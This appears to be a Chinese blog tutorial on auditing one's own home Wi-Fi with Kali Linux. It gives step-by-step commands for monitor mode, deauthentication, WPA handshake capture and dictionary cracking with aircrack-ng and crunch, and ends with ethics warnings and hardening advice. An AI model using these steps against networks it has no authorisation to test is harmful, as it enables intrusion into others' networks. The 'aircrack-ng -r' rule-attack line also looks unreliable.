1. 家庭Wi-Fi安全测试的必要性最近帮朋友检查家庭网络时发现他家的路由器居然还在用默认密码。这种情况其实非常普遍很多家庭Wi-Fi都存在安全隐患。作为技术爱好者我们完全可以用Kali Linux对自己的家庭网络做个健康检查。这就像定期体检一样能及时发现网络漏洞避免被不法分子利用。我上周就对自己的家庭Wi-Fi做了次完整的渗透测试。整个过程就像侦探破案一样有趣先是用监听模式捕捉无线信号然后捕获握手包最后尝试破解密码。当然我测试的都是自己的设备这点非常重要。通过这次实践不仅巩固了Aircrack-ng工具的使用技巧还发现自家路由器确实存在弱密码问题。2. 测试环境搭建2.1 硬件准备工欲善其事必先利其器。做Wi-Fi渗透测试需要准备以下硬件支持监听模式的无线网卡推荐RT3070芯片的某宝30-50元就能买到安装Kali Linux的电脑虚拟机或实体机都可以待测试的无线路由器必须是自己的设备我用的是一块COMFAST CF-912AC网卡实测支持监听模式和包注入。这里有个小技巧购买前一定要确认网卡芯片是否支持监听模式有些新款网卡反而可能不兼容。2.2 Kali Linux配置Kali默认就集成了我们需要的所有工具。首次使用时建议sudo apt update sudo apt upgrade -y更新系统后重点检查以下工具是否可用aircrack-ng --version wash --version reaver --version如果缺少任何工具可以用apt install安装。我习惯再装个terminator方便多窗口操作sudo apt install terminator3. 实战渗透测试全流程3.1 启用监听模式首先把网卡插入电脑用以下命令查看网卡状态iwconfig我的网卡识别为wlan0。开启监听模式前要先停止可能干扰的进程sudo airmon-ng check kill然后开启监听模式sudo airmon-ng start wlan0成功后会显示新接口名通常是wlan0mon。这里容易遇到两个坑网卡不支持监听模式换网卡解决驱动冲突用sudo modprobe -r 驱动名卸载冲突驱动3.2 扫描周边Wi-Fi用新接口扫描周边网络sudo airodump-ng wlan0mon这个命令会显示所有可探测到的Wi-Fi包括BSSID路由器MAC地址CH信道ESSIDWi-Fi名称信号强度我测试时发现自家Wi-Fi信号强度只有-75dBm这说明路由器位置需要调整。扫描时按CtrlC停止。3.3 捕获握手包选定目标Wi-Fi后必须是自己的开始捕获握手包sudo airodump-ng -c 6 --bssid 11:22:33:44:55:66 -w capture wlan0mon参数说明-c 指定信道--bssid 指定路由器MAC-w 指定保存文件名这时需要等设备连接Wi-Fi。为了加速过程可以新开终端发送解除认证包sudo aireplay-ng -0 2 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF wlan0mon当右上角出现WPA handshake时说明捕获成功。3.4 密码破解最后用aircrack-ng尝试破解sudo aircrack-ng -w rockyou.txt capture-01.caprockyou.txt是Kali自带的字典文件。如果密码不在字典里可以自己制作针对性字典crunch 8 12 0123456789 -o num.dict这个命令会生成8-12位纯数字字典。实测用GPU破解速度能快很多。4. 常见问题排查4.1 扫描不到Wi-Fi信号如果airodump-ng扫描不到信号可以尝试检查网卡与路由器距离更换监听频道重新加载网卡驱动sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up4.2 握手包捕获失败可能原因包括信号太弱尝试靠近路由器没有设备连接可以自己连手机路由器启用了WPA3需要其他工具4.3 破解速度太慢提升破解效率的方法使用更强大的字典启用GPU加速尝试规则攻击sudo aircrack-ng -r rules.txt capture-01.cap5. 安全建议与道德准则完成测试后我立即修改了自家Wi-Fi密码并启用了WPA2-PSK AES加密。其他安全建议包括关闭WPS功能设置MAC地址过滤定期更换复杂密码建议16位以上混合字符特别强调未经授权测试他人网络是违法行为。本文所有技术仅限用于自己的设备安全测试。建议在测试前签署书面授权协议明确测试范围和权限。这次实践让我意识到很多家庭网络的安全防护形同虚设。作为技术人员我们有责任帮助家人朋友排查网络隐患但必须严守道德法律底线。后续我准备深入研究WPA3的安全特性这可能是下个值得分享的话题。